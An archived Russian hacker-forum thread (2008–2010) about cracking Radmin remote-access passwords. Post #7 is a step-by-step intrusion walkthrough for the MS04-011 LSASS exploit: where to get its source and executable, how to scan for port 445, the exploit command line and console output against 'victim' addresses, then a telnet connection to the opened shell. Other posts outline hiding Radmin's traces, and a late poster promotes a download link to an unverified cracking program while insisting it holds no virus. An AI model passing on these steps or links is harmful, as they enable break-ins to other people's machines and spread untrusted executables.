Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

подбор пароля к РАдмину

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> подбор пароля к РАдмину
Имя
Сообщение << Старые топики   Новые топики >>
подбор пароля к РАдмину - 2008-11-09 21:12:58.066666   
grinkiv

Сообщений: 9
Оценки: 0
Присоединился: 2008-10-28 12:52:31.966666
есть ли прога которая перебором ищет пароль для доступа на РАдмин сервер?
Post #: 1
RE: подбор пароля к РАдмину - 2008-11-09 21:36:51.710000   
Абама из Барака

Сообщений: 10
Оценки: 0
Присоединился: 2008-11-09 16:28:07.413333
Есть, в огромном количестве. Одно, НО. Твой прербор со стороны радминовского серванта, заткнется на 10-20 попытке и уйдет в даун на эннацать секунд.
Post #: 2
RE: подбор пароля к РАдмину - 2008-11-12 18:41:15.956666   
Barkass$

Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
Таких програм валом в гугле. просто можно все сделать иначе, и большенства юзверов у которых стоит Радмин есть уязвимость ms 040-011
Тобиш, сканируем жертву, сканируем порт радмина, делаем бек конект.
посылаем запрос на машину/принимаем.
Заливаем пароль через ftp серв.
Можно добавить:
1-убарть звук при входе
2- убрать красную букву в трее
3-выполняет запуск радмина

ну и сомо собой после этого войт икак на рабочий стол либо в Корень Диска.

усе…;)


Post #: 3
RE: подбор пароля к РАдмину - 2008-11-12 19:16:14.776666   
19??

Сообщений: 44
Оценки: 0
Присоединился: 2008-01-31 21:14:08.970000
Чето ты помойму попутал. во первых не ms040-011 а ms04-011, а во вторых причем тут радмин и эта уязвимость?!
Post #: 4
RE: подбор пароля к РАдмину - 2008-11-12 19:24:39.146666   
Barkass$

Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
quote:

ORIGINAL: 19??

Чето ты помойму попутал. во первых не ms040-011 а ms04-011, а во вторых причем тут радмин и эта уязвимость?!


А, да , спс за правку уязвимости ) поздно пишу , время 2 ночи :)
__________________________________________________________

19??: во вторых причем тут радмин и эта уязвимость?!
_______

эта уязвимость связанна с DoS атаками и удаленным выполнением команд. Все что я писал выше, почти все делается в Доське.
+ вопрос был за "пароль радмина" - ответ как его по локалке можно поменять, а не узнать какой стоит в данный момент.
Post #: 5
RE: подбор пароля к РАдмину - 2008-11-12 19:25:46.320000   
multiplexor

Сообщений: 16
Оценки: 0
Присоединился: 2008-11-06 01:46:30.456666
можно поподробней пожалуйста?
Post #: 6
RE: подбор пароля к РАдмину - 2008-11-12 19:45:20.683333   
Barkass$

Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
Для работы нам понадобится сам эксплоит, сканер портов и любой Telnet клиент.
Исходники эксплоита лежать здесь - HOD-ms04011-lsasrv-expl.c (http://www.web-hack.ru/exploit/exploit.php?go=157)
Откомпилированную версию можно скачать по этому адресу - HOD-ms04011-lsasrv-expl.exe (http://open.firstvds.ru/HOD-ms04011-lsasrv-expl.exe)
В качестве сканера мы будем использовать XSpider 7.0 Demo версия для этого подойдет.
Из Telnet клиентов могу посоветовать SecureCRT (http://www.vandyke.com) и Putty (http://www.web-hack.ru/download/info.php?go=35).

Для начала нам нужно найти подходящую цель для атаки.
Конечно, можно воспользоваться "методом научного тыка", но мы рассмотрим более надёжные варианты
Как известно, на атакуемой системе должен быть открыть 445 порт, этим мы и воспользуемся.
Мы будем сканировать нужные IP-диапазоны в поисках 445 порта. В этом нам и поможет XSpider. При желании можно воспользоваться любым другим сканером, но я остановился именно на XSpider так как он имеет удобный интерфейс, работает быстро да ещё и распространяется бесплатно =)
Углубляться в его работу я не буду, так как особых проблем это вызвать не должно.

Итак, по завершении работы XSpider выдаёт нам следующий результат:
- 192.168.7.35 [avt21.redriver.local] (128)
где [avt21 имя машины жертвы , а redriver.local] рабочая группа жертвы
139 / tcp NetBIOS
Удаленное выполнение команд (ms 04-007)
найдено несколько уязвимостей начиная от Dos атак и заканчивая удаленным доступом

Attack
`-=-=—–=-=-`

Теперь перейдём к самому процессу взлома.
Запускаем эксплоит(обязательно указывая версию ОС, атакуемый IP и bindport):

C:\exp\HOD-ms04011-lsasrv-expl.exe 0 192.168.7.35 11123

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
— Coded by .::[ houseofdabus ]::. —

  • Target: IP: 192.168.7.35: OS: WinXP Professional [universal] lsass.exe
  • Connecting to 192.168.7.35:445 …
  • [-] Sorry, cannot connect to 192.168.7.35:445. Try again…

    Не вышло, эксплоит не смог присоединиться к атакуемому компьютеру.
    Причин этому может быть несколько:
    - помешал запущенный Firewall;
    - объект атаки оказался пропатчен;
    - не подошла версия операционной системы;
    - компьютер жертвы вышел из сети …

    Однако как сказал Воланд, "человек смертен, но это было бы ещё полбеды. Плохо то, что он иногда внезапно смертен, вот в чём фокус!", так что мы не будем останавливаться и попытаем счастье на следующей жертве.

    C:\exp\HOD-ms04011-lsasrv-expl.exe 0 192.168.7.36 11123

    MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
    — Coded by .::[ houseofdabus ]::. —

  • Target: IP: 192.168.7.36: OS: WinXP Professional [universal] lsass.exe
  • Connecting to 192.168.7.36:445 … OK
  • Attacking … OK

  • Да, здесь нам повезло гораздо больше.
    Удачно прошёл как процесс присоединения, так и процесс эксплоитинга.
    Остаётся только запустить любимый Telnet клиент и присоединиться к взломанному компьютеру.
    IP: 192.168.7.35, Port: 11123
    Post #: 7
    RE: подбор пароля к РАдмину - 2008-11-12 21:00:53.766666   
    MotoKiller

    Сообщений: 1732
    Оценки: 56
    Присоединился: 2008-03-02 20:08:53.810000
    ну перебор займет значительное количество времени, так как сверение пароля происходит по времени не мгновенно.
    Так что надо искать уязвимости. Или писать скрипт добавляющий нужного пользователя с нужным паролем.
    Post #: 8
    RE: подбор пароля к РАдмину - 2010-06-01 23:34:46.836666   
    creative210289

    Сообщений: 3
    Оценки: 0
    Присоединился: 2010-06-01 23:32:00.633333

    Прива всем….Так же долго искал решение проблемы и НАШЕЛ!!!!!!!!!!Очень долго файлик етот не получалось у меня найти но нашел……И хочу всех им порадовать!Проверял его у себя в локалке!Правда поменял параметры поиска паролей…ну в 80% находит пароли у меня на версии до 3й……так что рад буду им с вами поделится…….
    http://depositfiles.com/files/furiu7h7n
    совет по настройке:
    входите в меню диапазон ввоиде нужный…..айпи
    входите в сканер-плагины-протопен-и убираете настройку ВКЛ галочку тоисть надо убрать
    порт 445 не меняем……
    а так прога полностью готова…..НАЖИМАЕМ Ф5 и поиск пошел внизу пишет смог подобрать пароль или нет….если смог сразу его выдает!!!нет никаких проблем……ед минус ко всем идеально не подошел….но почти везде где я хотел я подобрал…реально работает…разваода нет….ето мой первый файл что я выкидываю в нет!просто хочу помочь!надеюсь на спасибо
    Post #: 9
    RE: подбор пароля к РАдмину - 2010-06-01 23:38:43.660000   
    creative210289

    Сообщений: 3
    Оценки: 0
    Присоединился: 2010-06-01 23:32:00.633333
    http://depositfiles.com/files/furiu7h7n Еще раз кидаю ссылку! Тут нет не вируса не трояна.!!!!!!!!мой каспер молчит а прога работает
    Post #: 10
    RE: подбор пароля к РАдмину - 2010-06-01 23:39:45.990000   
    creative210289

    Сообщений: 3
    Оценки: 0
    Присоединился: 2010-06-01 23:32:00.633333
    короче введете кому надо перед ети депотиз файлс…как положено потом через слеш ето files/furiu7h7n
    Post #: 11
    Страниц:  [1]
    Все форумы >> [В Сети] >> подбор пароля к РАдмину







    Связаться:
    Вопросы по сайту / xakep@glc.ru

    Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.